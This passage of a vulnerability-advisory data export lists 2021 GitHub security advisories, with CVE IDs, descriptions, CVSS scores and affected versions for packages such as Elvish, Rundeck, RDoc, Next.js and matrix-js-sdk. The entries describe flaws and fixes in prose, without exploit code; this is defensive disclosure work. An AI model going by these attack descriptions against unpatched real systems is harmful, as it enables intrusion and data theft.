* Open an issue in [the `bytecodealliance/wasmtime` repository](https://github.com/bytecodealliance/wasmtime/) | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H'}] | [{'package': {'ecosystem': 'crates.io', 'name': 'wasmtime'}, 'ecosystem_specific': {'affected_functions': ['wasmtime::Linker::func_new', 'wasmtime::Linker::func_wrap', 'wasmtime::Store::gc']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.30.0'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/bytecodealliance/wasmtime/security/advisories/GHSA-v4cp-h94r-m7xf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39216'}, {'type': 'WEB', 'url': 'https://github.com/bytecodealliance/wasmtime/commit/101998733b74624cbd348a2366d05760b40181f3'}, {'type': 'WEB', 'url': 'https://crates.io/crates/wasmtime'}, {'type': 'PACKAGE', 'url': 'https://github.com/bytecodealliance/wasmtime'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAVBRYDDUIY2ZR3K3FO4BVYJKIMJ5TP7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z2Z33FTXFQ6EOINVEQIP4DFBG53G5XIY/'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0110.html'}] | {'cwe_ids': ['CWE-416'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-17T20:05:21Z', 'nvd_published_at': '2021-09-17T20:15:00Z'} |
1.4.0 | GHSA-fpv6-f8jw-rc3r | 2022-08-15T20:07:49Z | 2021-09-23T23:17:33Z | null | ['CVE-2021-41088'] | Elvish vulnerable to remote code execution via the web UI backend | ### Impact
Elvish's backend for the experimental web UI (started by `elvish -web`) hosts an endpoint that allows executing the code sent from the web UI.
The backend does not check the origin of requests correctly. As a result, if the user has the web UI backend open and visits a compromised or malicious website, the website can send arbitrary code to the endpoint in localhost.
### Patches
All Elvish releases since 0.14.0 no longer include the experimental web UI, although it is still possible for the user to build a version from source that includes it.
The issue can be patched for previous versions by removing the web UI (found in web, pkg/web or pkg/prog/web, depending on the exact version).
### Workarounds
Do not use the experimental web UI.
### For more information
If you have any questions or comments about this advisory, please email xiaqqaix@gmail.com. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/elves/elvish'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.0'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/elves/elvish/security/advisories/GHSA-fpv6-f8jw-rc3r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41088'}, {'type': 'WEB', 'url': 'https://github.com/elves/elvish/commit/ccc2750037bbbfafe9c1b7a78eadd3bd16e81fe5'}, {'type': 'PACKAGE', 'url': 'https://github.com/elves/elvish'}] | {'cwe_ids': ['CWE-346', 'CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-23T21:06:47Z', 'nvd_published_at': '2021-09-23T20:15:00Z'} |
1.4.0 | GHSA-9p5g-vg43-mj5r | 2023-09-26T13:13:17Z | 2021-09-27T20:13:25Z | null | ['CVE-2021-36749'] | Druid ingestion system Authenticated users can read data from other sources than intended | In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.apache.druid:druid-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.22.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36749'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-793h-6f7r-6qvm'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r304dfe56a5dfe1b2d9166b24d2c74ad1c6730338b20aef77a00ed2be@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E'}] | {'cwe_ids': ['CWE-668', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-27T19:20:40Z', 'nvd_published_at': '2021-09-24T10:15:00Z'} |
1.4.0 | GHSA-48mj-p7x2-5jfm | 2021-09-28T21:10:08Z | 2021-09-29T17:09:14Z | null | ['CVE-2021-41104'] | Basic auth bypass in esphome | ### Impact
Anyone with web_server enabled and HTTP basic auth configured on 2021.9.1 or older
`web_server` allows OTA update without checking user defined basic auth username & password
### Patches
Patch released in 2021.9.2
### Workarounds
Disable/remove `web_server`
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'esphome'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2021.9.2'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/esphome/esphome/security/advisories/GHSA-48mj-p7x2-5jfm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41104'}, {'type': 'WEB', 'url': 'https://github.com/esphome/esphome/pull/2409/commits/207cde1667d8c799a197b78ca8a5a14de8d5ca1e'}, {'type': 'WEB', 'url': 'https://github.com/esphome/esphome/commit/be965a60eba6bb769e2a5afdbc8eed132f077a59'}, {'type': 'PACKAGE', 'url': 'https://github.com/esphome/esphome'}, {'type': 'WEB', 'url': 'https://github.com/esphome/esphome/releases/tag/2021.9.2'}] | {'cwe_ids': ['CWE-306'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-28T21:10:08Z', 'nvd_published_at': '2021-09-28T16:15:00Z'} |
1.4.0 | GHSA-fhv8-fx5f-7fxf | 2022-09-11T22:26:04Z | 2021-09-20T19:53:15Z | null | ['CVE-2021-39227'] | Prototype Pollution in the merge and clone helper methods | ### Impact
Using `merge` and `clone` helper methods in the `src/core/util.ts` module will have prototype pollution. It will affect the popular data visualization library Apache ECharts, which is using and exported these two methods directly.
### Patches
It has been patched in https://github.com/ecomfe/zrender/pull/826.
Users should update zrender to `5.2.1`. and update echarts to `5.2.1` if project is using echarts. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': 'zrender'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/ecomfe/zrender/security/advisories/GHSA-fhv8-fx5f-7fxf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39227'}, {'type': 'WEB', 'url': 'https://github.com/ecomfe/zrender/pull/826'}, {'type': 'PACKAGE', 'url': 'https://github.com/ecomfe/zrender'}, {'type': 'WEB', 'url': 'https://github.com/ecomfe/zrender/releases/tag/5.2.1'}] | {'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-17T17:51:46Z', 'nvd_published_at': '2021-09-17T14:15:00Z'} |
1.4.0 | GHSA-99px-7724-484v | 2021-09-24T13:10:31Z | 2021-09-13T20:06:38Z | null | ['CVE-2021-40146'] | Remote Code Execution in Any23 | A Remote Code Execution (RCE) vulnerability was discovered in the Any23 YAMLExtractor.java file and is known to affect Any23 versions < 2.5. RCE vulnerabilities allow a malicious actor to execute any code of their choice on a remote machine over LAN, WAN, or internet. RCE belongs to the broader class of arbitrary code execution (ACE) vulnerabilities. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.apache.any23:apache-any23'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40146'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/any23'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7c521ed85c7ae1bad4fdf95b459f2aaa8a67eae338636b7b7ec35d86%40%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/09/11/2'}] | {'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-13T19:31:57Z', 'nvd_published_at': '2021-09-11T11:15:00Z'} |
1.4.0 | GHSA-c442-3278-rhrg | 2021-09-16T19:26:04Z | 2021-09-09T17:08:46Z | null | ['CVE-2021-36440'] | Unrestricted File Upload in ShowDoc v2.9.5 | Unrestricted File Upload in ShowDoc v2.9.5 allows remote attackers to execute arbitrary code via the 'file_url' parameter in the component AdminUpdateController.class.php'. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.6'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36440'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/issues/1406'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/49b992d4c548c8c615a92b6efe8a50c8f1083abf'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}] | {'cwe_ids': ['CWE-434'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-09T13:18:05Z', 'nvd_published_at': '2021-09-08T21:15:00Z'} |
1.4.0 | GHSA-45h5-r968-5xr7 | 2021-09-27T18:51:18Z | 2021-09-20T20:29:40Z | null | ['CVE-2021-22147'] | Exposure of sensitive information in Elasticsearch | A flaw was discovered in Elasticsearch where document and field level security was not applied to searchable snapshots. This could lead to an authenticated user gaining access to information that they are unauthorized to view. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.11.0'}, {'fixed': '7.14.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22147'}, {'type': 'WEB', 'url': 'https://discuss.elastic.co/t/elastic-stack-7-14-0-security-update/280344'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211008-0002/'}, {'type': 'WEB', 'url': 'https://www.elastic.co/community/security/'}] | {'cwe_ids': ['CWE-732', 'CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-16T17:10:33Z', 'nvd_published_at': '2021-09-15T12:15:00Z'} |
1.4.0 | GHSA-23cm-x6j7-6hq3 | 2023-08-08T19:58:08Z | 2021-09-14T20:24:18Z | null | ['CVE-2021-40823'] | matrix-js-sdk can be tricked into disclosing E2EE room keys to a participating homeserver | ### Impact
A logic error in the room key sharing functionality of matrix-js-sdk before 12.4.1 allows a malicious Matrix homeserver† participating in an encrypted room to steal room encryption keys from affected Matrix clients participating in that room. This allows the homeserver to decrypt end-to-end encrypted messages sent by affected clients.
† Or anyone with access to the account of the original recipient of an encrypted message.
Known clients affected (via their use of vulnerable versions of matrix-js-sdk):
- Element Web (1.8.2 and earlier)
- Element Desktop (1.8.2 and earlier)
- SchildiChat Web (1.7.32-sc1 and earlier)
- SchildiChat Desktop (1.7.32-sc1 and earlier)
- Cinny (1.2.0 and earlier)
### Patch
This was fixed in https://github.com/matrix-org/matrix-js-sdk/commit/894c24880da0e1cc81818f51c0db80e3c9fb2be9.
### Workarounds
To prevent a homeserver from being able to steal the room keys, vulnerable clients can be taken offline or signed out. If signing out, care should be taken to either set up Secure Backup or export E2E room keys in order to preserve access to past messages. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'matrix-js-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.4.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-23cm-x6j7-6hq3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40823'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-js-sdk/commit/894c24880da0e1cc81818f51c0db80e3c9fb2be9'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/matrix-js-sdk'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-js-sdk/releases/tag/v12.4.1'}, {'type': 'WEB', 'url': 'https://matrix.org/blog/2021/09/13/vulnerability-disclosure-key-sharing'}] | {'cwe_ids': ['CWE-200', 'CWE-327'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-14T18:08:41Z', 'nvd_published_at': '2021-09-13T19:15:00Z'} |
1.4.0 | GHSA-qvm7-23cj-437v | 2021-09-20T20:15:45Z | 2021-09-10T17:54:37Z | null | ['CVE-2021-36161'] | Remote Code Execution in Apache Dubbo | Some component in Dubbo will try to print the formated string of the input arguments, which will possibly cause RCE for a maliciously customized bean with special toString method. In the latest version, we fix the toString call in timeout, cache and some other places. Fixed in Apache Dubbo 2.7.13 | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.apache.dubbo:dubbo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.13'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36161'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/dubbo'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r40212261fd5d638074b65f22ac73eebe93ace310c79d4cfcca4863da%40%3Cdev.dubbo.apache.org%3E'}] | {'cwe_ids': ['CWE-134'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-10T16:45:06Z', 'nvd_published_at': '2021-09-09T08:15:00Z'} |
1.4.0 | GHSA-f2c5-997w-7f5c | 2021-09-24T13:07:20Z | 2021-09-20T20:42:41Z | null | ['CVE-2021-3780'] | Cross-site Scripting in peertube | peertube is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). It was found that one could upload a SVG image and then send the url of that to other users and when they open the link we can get their complete session keys as the session keys stored in local storage and with Javascript easily can be stolen by attackers. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'peertube'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3780'}, {'type': 'WEB', 'url': 'https://github.com/chocobozzz/peertube/commit/0ea2f79d45b301fcd660efc894469a99b2239bf6'}, {'type': 'PACKAGE', 'url': 'https://github.com/chocobozzz/peertube'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/282807a8-4bf5-4fe2-af62-e05f945b3d65'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-16T17:32:58Z', 'nvd_published_at': '2021-09-15T12:15:00Z'} |
1.4.0 | GHSA-q4rf-3fhx-88pf | 2021-08-30T22:03:16Z | 2021-09-01T18:27:01Z | null | ['CVE-2021-39132'] | YAML deserialization can run untrusted code | ### Impact
An authorized user can upload a zip-format plugin with a crafted plugin.yaml, or a crafted aclpolicy yaml file, or upload an untrusted project archive with a crafted aclpolicy yaml file, that can cause the server to run untrusted code on Rundeck Community or Enterprise Edition. An authenticated user can make a POST request, that can cause the server to run untrusted code on Rundeck Enterprise Edition.
The zip-format plugin issues requires authentication and authorization to these access levels, and affects all Rundeck editions:
* `admin` level access to the `system` resource type
The ACL Policy yaml file upload issues requires authentication and authorization to these access levels, and affects all Rundeck editions:
* `create` `update` or `admin` level access to a `project_acl` resource
* `create` `update` or `admin` level access to the `system_acl` resource
The unauthorized POST request requires authentication, but no specific authorization, and affects Rundeck Enterprise only.
### Patches
Versions 3.4.3, 3.3.14
### Workarounds
Please visit [https://rundeck.com/security](https://rundeck.com/security) for information about specific workarounds.
### For more information
If you have any questions or comments about this advisory:
* Email us at [security@rundeck.com](mailto:security@rundeck.com)
To report security issues to Rundeck please use the form at [https://rundeck.com/security](https://rundeck.com/security)
Reporter: Rojan Rijal from Tinder Red Team | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.rundeck:rundeck-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.4.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.rundeck:rundeck-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.14'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/rundeck/rundeck/security/advisories/GHSA-q4rf-3fhx-88pf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39132'}, {'type': 'WEB', 'url': 'https://github.com/rundeck/rundeck/commit/850d12e21d22833bc148b7f458d7cb5949f829b6'}, {'type': 'PACKAGE', 'url': 'https://github.com/rundeck/rundeck'}] | {'cwe_ids': ['CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T22:03:16Z', 'nvd_published_at': '2021-08-30T20:15:00Z'} |
1.4.0 | GHSA-ggxm-pgc9-g7fp | 2022-07-29T17:57:31Z | 2021-09-01T18:53:15Z | null | ['CVE-2021-31799'] | Arbitrary Code Execution in Rdoc | In RDoc 3.11 through 6.x before 6.3.1, as distributed with Ruby through 3.0.1, it is possible to execute arbitrary code via | and tags in a filename. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'RubyGems', 'name': 'rdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11'}, {'fixed': '6.1.2.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.1.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.3.0'}, {'fixed': '6.3.1'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31799'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rdoc/commit/a7f5d6ab88632b3b482fe10611382ff73d14eed7'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruby/rdoc'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rdoc/CVE-2021-31799.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00009.html'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2021-31799'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210902-0004/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2021/05/02/os-command-injection-in-rdoc/'}] | {'cwe_ids': ['CWE-74', 'CWE-77', 'CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T18:08:41Z', 'nvd_published_at': '2021-07-30T14:15:00Z'} |
1.4.0 | GHSA-2v88-qq7x-xq5f | 2021-09-01T18:20:20Z | 2021-09-01T18:21:55Z | null | ['CVE-2021-39170'] | Improper Encoding or Escaping of Output in Asset Metadata Component | Pimcore is an open source data & experience management platform. Prior to version 10.1.2, an authenticated user could add XSS code as a value of custom metadata on assets. There is a patch for this issue in Pimcore version 10.1.2. As a workaround, users may apply the patch manually. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.1.2'}]}], 'database_specific': {'last_known_affected_version_range': '< 10.1.1'}}] | [{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-2v88-qq7x-xq5f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39170'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/10178'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/10178.patch'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/10206'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c3e4cf79-a4b5-4982-af27-729f66281501/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/e4cb9cd8-89cf-427c-8d2e-37ca40099bf2/'}] | {'cwe_ids': ['CWE-116', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-01T18:20:20Z', 'nvd_published_at': '2021-09-01T14:15:00Z'} |
1.4.0 | GHSA-9gr3-7897-pp7m | 2021-08-31T20:01:51Z | 2021-09-01T18:24:22Z | null | ['CVE-2021-39178'] | XSS in Image Optimization API for Next.js | ### Impact
- **Affected:** All of the following must be true to be affected
- Next.js between version 10.0.0 and 11.1.0
- The `next.config.js` file has [`images.domains`](https://nextjs.org/docs/basic-features/image-optimization#domains) array assigned
- The image host assigned in [`images.domains`](https://nextjs.org/docs/basic-features/image-optimization#domains) allows user-provided SVG
- **Not affected**: The `next.config.js` file has [`images.loader`](https://nextjs.org/docs/basic-features/image-optimization#loader) assigned to something other than default
- **Not affected**: Deployments on [Vercel](https://vercel.com) are not affected
### Patches
[Next.js v11.1.1](https://github.com/vercel/next.js/releases/tag/v11.1.1)
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': 'next'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '11.1.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/vercel/next.js/security/advisories/GHSA-9gr3-7897-pp7m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39178'}, {'type': 'WEB', 'url': 'https://github.com/vercel/next.js/pull/28620'}, {'type': 'WEB', 'url': 'https://github.com/vercel/next.js/commit/7afc97c5744b38bdf36aa7f87625f438224688aa'}, {'type': 'PACKAGE', 'url': 'https://github.com/vercel/next.js'}, {'type': 'WEB', 'url': 'https://github.com/vercel/next.js/releases/tag/v11.1.1'}] | {'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-31T20:01:51Z', 'nvd_published_at': '2021-08-31T00:15:00Z'} |
1.4.0 | GHSA-729f-wvj3-c4pj | 2023-09-26T17:31:51Z | 2021-09-20T20:45:03Z | null | ['CVE-2020-21125'] | Remote code execution in UReport | An arbitrary file creation vulnerability in UReport 2.2.9 allows attackers to execute arbitrary code. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'com.bstek.ureport:ureport2-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.9'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-21125'}, {'type': 'WEB', 'url': 'https://github.com/youseries/ureport/issues/485'}, {'type': 'PACKAGE', 'url': 'https://github.com/youseries/ureport'}] | {'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-16T18:50:53Z', 'nvd_published_at': '2021-09-15T17:15:00Z'} |
1.4.0 | GHSA-6gr8-c3m5-mvrg | 2021-06-25T15:26:54Z | 2021-09-08T18:00:47Z | null | ['CVE-2021-32717'] | Exposure of Sensitive Information to an Unauthorized Actor | Shopware is an open source eCommerce platform. In versions prior to 6.4.1.1 private files publicly accessible with Cloud Storage providers when the hashed URL is known. Users are recommend to first change their configuration to set the correct visibility according to the documentation. The visibility must be at the same level as `type`. When the Storage is saved on Amazon AWS we recommending disabling public access to the bucket containing the private files: https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html. Otherwise, update to Shopware 6.4.1.1 or install or update the Security plugin (https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659) and run the command `./bin/console s3:set-visibility` to correct your cloud file visibilities.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}] | [{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-vrf2-xghr-j52v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32717'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/ba52f683372b8417a00e9014f481ed3d539f34b3'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-06-2021'}] | {'cwe_ids': ['CWE-200', 'CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-25T15:26:54Z', 'nvd_published_at': '2021-06-24T21:15:00Z'} |
1.4.0 | GHSA-f34x-8pf6-qc9c | 2021-09-15T18:27:54Z | 2021-09-08T17:42:18Z | null | ['CVE-2021-40143'] | HTTP header injection in Sonatype Nexus Repository | Sonatype Nexus Repository 3.x through 3.33.1-01 is vulnerable to an HTTP header injection. By sending a crafted HTTP request, a remote attacker may disclose sensitive information or request external resources from a vulnerable instance. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.sonatype.nexus:nexus-repository'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.34.0-01'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.33.1-01'}}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40143'}, {'type': 'PACKAGE', 'url': 'https://github.com/sonatype/nexus-public'}, {'type': 'WEB', 'url': 'https://help.sonatype.com/repomanager3/release-notes/2021-release-notes'}, {'type': 'WEB', 'url': 'https://issues.sonatype.org/secure/ReleaseNote.jspa'}, {'type': 'WEB', 'url': 'https://support.sonatype.com/hc/en-us/articles/4405941762579'}] | {'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-08T17:35:50Z', 'nvd_published_at': '2021-09-07T20:15:00Z'} |
